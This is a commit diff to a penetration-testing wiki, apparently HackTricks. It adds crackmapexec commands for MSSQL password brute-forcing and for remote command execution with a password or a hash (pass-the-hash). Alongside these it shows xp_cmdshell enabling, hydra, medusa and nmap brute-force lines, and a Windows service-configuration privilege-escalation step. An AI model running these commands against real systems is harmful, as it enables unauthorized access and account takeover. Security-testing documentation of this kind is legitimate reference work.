GitBook: [master] 3 pages modified

brute-force.md

@@ -298,6 +298,7 @@ hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for
 
 ```bash
 #Use the NetBIOS name of the machine as domain
+crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
 hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
 medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
 nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts

pentesting/pentesting-mssql-microsoft-sql-server.md

@@ -81,11 +81,16 @@ msf> use windows/manage/mssql_local_auth_bypass
 ### Execute commands
 
 ```bash
+#Username + Password + CMD command
+crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
+#Username + Hash + PS command
+crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
+
 #this turns on advanced options and is needed to configure xp_cmdshell
 sp_configure 'show advanced options', '1'
 RECONFIGURE
 #this enables xp_cmdshell
-sp_configure 'xp_cmdshell', '1' 
+sp_configure 'xp_cmdshell', '1'
 RECONFIGURE
 # Quickly check what the service account is via xp_cmdshell
 EXEC master..xp_cmdshell 'whoami'

windows/windows-local-privilege-escalation/README.md

@@ -488,6 +488,12 @@ sc config SSDPSRV obj= ".\LocalSystem" password= ""
 
 **Take into account that the service upnphost depends on SSDPSRV to work \(for XP SP1\)**
 
+**Another workaround** of this problem is running:
+
+```text
+sc.exe config usosvc start= auto
+```
+
 ### **Modify service binary path**
 
 If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do: